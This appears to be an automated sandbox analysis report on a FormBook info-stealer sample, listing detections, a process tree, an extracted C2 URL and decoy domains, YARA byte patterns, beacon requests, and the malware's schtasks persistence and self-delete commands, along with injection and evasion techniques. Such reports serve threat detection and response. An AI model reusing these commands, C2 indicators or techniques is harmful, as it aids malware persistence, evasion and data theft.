Analysis Report gzU8odwaPalRTGB.exe

Overview

General Information

Sample Name: gzU8odwaPalRTGB.exe
Analysis ID: 383962
MD5: bc0859493d8419f5ffe0468d23938256
SHA1: 70c3b42db2fc29bb0de21db911b85adf600fb9f2
SHA256: 64f1791681e261b0e652130f8f7fca8e1098a4c03fee49652a14d682681f85cf
Tags: Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • gzU8odwaPalRTGB.exe (PID: 3092 cmdline: 'C:\Users\user\Desktop\gzU8odwaPalRTGB.exe' MD5: BC0859493D8419F5FFE0468D23938256)
    • schtasks.exe (PID: 2596 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fgEePtnFJH' /XML 'C:\Users\user\AppData\Local\Temp\tmpDFE8.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 6228 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 6904 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 7068 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.smarttel.management/msc/"], "decoy": ["vanwertfamilyhealth.com", "amiawke.com", "hq-leaks.net", "playersgolfworld.info", "atlantaoffshore.com", "redstateaf.com", "leosquad.world", "elchtec.com", "mjshenanigans.com", "rbsccj.com", "360healthy.life", "sympa.digital", "afrotresor.com", "amazingliberty.com", "realsults.com", "preethamgudichuttu.com", "anastasiavegilates.com", "blockchainfest.asia", "viaverdeproject.net", "shouryashukla.com", "african-elephant.com", "factorysale.online", "vqxxmrxhpsho.mobi", "munchstaging.com", "codealemayohabrha.com", "melrosecakecompany.com", "themaskamigo.com", "aviatop.online", "coivdanswers.com", "geralouittane.com", "amazonshack.com", "aeguana.info", "samaalkaleej.com", "disruptorgen.com", "crystalcpv.com", "lsertsex.com", "affiliatesupersummit.com", "tintuc-247.info", "balakawu.com", "smartecomall.com", "chorahouses.com", "bellezaorganica.club", "greenbayhemorrhoidcenter.com", "iklanlaskar.com", "oldtownbusinessdistrict.com", "hindmetalhouse.com", "diligentpom.com", "genetic-web.com", "novergi.com", "sincetimebegan.com", "foodyfie.com", "wfiboostrs.com", "startuphrs.com", "vkjuzcsh.icu", "primarewards.net", "snappygarden.com", "rangerpoint.net", "meramission.com", "adsatadvanstar.com", "railrockers.com", "smartlightinggreenidea.com", "streetsmartlove.net", "shnfxj.com", "sms-master.online"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      5.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        5.2.RegSvcs.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.RegSvcs.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        5.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          5.2.RegSvcs.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          System Summary:

          Sigma detected: Scheduled temp file as task from temp location
          Source: Process started, Author: Joe Security, Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fgEePtnFJH' /XML 'C:\Users\user\AppData\Local\Temp\tmpDFE8.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fgEePtnFJH' /XML 'C:\Users\user\AppData\Local\Temp\tmpDFE8.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\gzU8odwaPalRTGB.exe' , ParentImage: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe, ParentProcessId: 3092, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fgEePtnFJH' /XML 'C:\Users\user\AppData\Local\Temp\tmpDFE8.tmp', ProcessId: 2596

          Signature Overview

          AV Detection:

          Antivirus / Scanner detection for submitted sample
          Source: gzU8odwaPalRTGB.exe, Avira: detected
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Roaming\fgEePtnFJH.exe, Avira: detection malicious, Label: HEUR/AGEN.1138557
          Found malware configuration
          Source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook (configuration identical to the one listed under Malware Configuration)
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Roaming\fgEePtnFJH.exe, ReversingLabs: Detection: 29%
          Multi AV Scanner detection for submitted file
          Source: gzU8odwaPalRTGB.exe, ReversingLabs: Detection: 29%
          Yara detected FormBook
          Source: Yara match, File source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Roaming\fgEePtnFJH.exe, Joe Sandbox ML: detected
          Machine Learning detection for sample
          Source: gzU8odwaPalRTGB.exe, Joe Sandbox ML: detected
          Source: 5.2.RegSvcs.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: gzU8odwaPalRTGB.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: gzU8odwaPalRTGB.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.291054222.000000000EC20000.00000002.00000001.sdmp
          Source: Binary string: RegSvcs.pdb, source: rundll32.exe, 0000000F.00000002.506707645.000000000549F000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000005.00000002.306866453.000000000100F000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, rundll32.exe
          Source: Binary string: rundll32.pdb source: RegSvcs.exe, 00000005.00000002.306707675.0000000000DE0000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 00000005.00000002.306707675.0000000000DE0000.00000040.00000001.sdmp
          Source: Binary string: RegSvcs.pdb source: rundll32.exe, 0000000F.00000002.506707645.000000000549F000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.291054222.000000000EC20000.00000002.00000001.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4x nop then pop edi, 5_2_00416CA2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4x nop then pop edi, 5_2_00417D70
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4x nop then pop edi, 15_2_00F76CA2
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4x nop then pop edi, 15_2_00F77D70

          Networking:

          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.smarttel.management/msc/
          Source: global traffic, HTTP traffic detected: GET /msc/?szr8=ZuDCMQ3I4T3VSTegk+AGxuqfe6TeNyWCjdwuw+un6PC0oplRc+HjqgF4wozRSCgma/XR&4hnPsj=W2J4SLjHGHypclVp HTTP/1.1 | Host: www.novergi.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /msc/?szr8=SLnxv5WEj6Yhjlrb8B4FzKU74ag+VtkikWCAHb2VKlwGrAtgyss6rL13pJnEzWIQGWFv&4hnPsj=W2J4SLjHGHypclVp HTTP/1.1 | Host: www.realsults.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: Joe Sandbox View, ASN Name: ACPCA ACPCA
          Source: Joe Sandbox View, ASN Name: HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHK HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHK
          Source: unknown, DNS traffic detected: queries for: www.novergi.com
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 08 Apr 2021 11:13:25 GMT | Server: Apache/2.4.29 (Ubuntu) | Content-Length: 327 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /msc/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeCode function: 0_2_07D56E58 NtQueryInformationProcess,0_2_07D56E58
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeCode function: 0_2_07D56E51 NtQueryInformationProcess,0_2_07D56E51
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419D60 NtCreateFile,5_2_00419D60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419E10 NtReadFile,5_2_00419E10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419E90 NtClose,5_2_00419E90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419F40 NtAllocateVirtualMemory,5_2_00419F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419D5A NtCreateFile,5_2_00419D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419E0A NtReadFile,5_2_00419E0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00419F3A NtAllocateVirtualMemory,5_2_00419F3A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F598F0 NtReadVirtualMemory,LdrInitializeThunk,5_2_00F598F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59860 NtQuerySystemInformation,LdrInitializeThunk,5_2_00F59860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59840 NtDelayExecution,LdrInitializeThunk,5_2_00F59840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F599A0 NtCreateSection,LdrInitializeThunk,5_2_00F599A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_00F59910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59A50 NtCreateFile,LdrInitializeThunk,5_2_00F59A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59A20 NtResumeThread,LdrInitializeThunk,5_2_00F59A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59A00 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00F59A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F595D0 NtClose,LdrInitializeThunk,5_2_00F595D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59540 NtReadFile,LdrInitializeThunk,5_2_00F59540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F596E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_00F596E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_00F59660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F597A0 NtUnmapViewOfSection,LdrInitializeThunk,5_2_00F597A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59780 NtMapViewOfSection,LdrInitializeThunk,5_2_00F59780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59710 NtQueryInformationToken,LdrInitializeThunk,5_2_00F59710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F598A0 NtWriteVirtualMemory,5_2_00F598A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F5B040 NtSuspendThread,5_2_00F5B040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59820 NtEnumerateKey,5_2_00F59820
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F599D0 NtCreateProcessEx,5_2_00F599D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59950 NtQueueApcThread,5_2_00F59950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59A80 NtOpenDirectoryObject,5_2_00F59A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59A10 NtQuerySection,5_2_00F59A10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F5A3B0 NtGetContextThread,5_2_00F5A3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59B00 NtSetValueKey,5_2_00F59B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F595F0 NtQueryInformationFile,5_2_00F595F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59560 NtWriteFile,5_2_00F59560
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F5AD30 NtSetContextThread,5_2_00F5AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59520 NtWaitForSingleObject,5_2_00F59520
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F596D0 NtCreateKey,5_2_00F596D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59670 NtQueryInformationProcess,5_2_00F59670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59650 NtQueryValueKey,5_2_00F59650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59610 NtEnumerateValueKey,5_2_00F59610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59FE0 NtCreateMutant,5_2_00F59FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59770 NtSetInformationFile,5_2_00F59770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F5A770 NtOpenThread,5_2_00F5A770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59760 NtOpenProcess,5_2_00F59760
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F59730 NtQueryVirtualMemory,5_2_00F59730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F5A710 NtOpenProcessToken,5_2_00F5A710
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9860 NtQuerySystemInformation,LdrInitializeThunk,15_2_04FD9860
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9840 NtDelayExecution,LdrInitializeThunk,15_2_04FD9840
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD95D0 NtClose,LdrInitializeThunk,15_2_04FD95D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD99A0 NtCreateSection,LdrInitializeThunk,15_2_04FD99A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9540 NtReadFile,LdrInitializeThunk,15_2_04FD9540
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD9910 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_04FD9910
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD96E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_04FD96E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD96D0 NtCreateKey,LdrInitializeThunk,15_2_04FD96D0
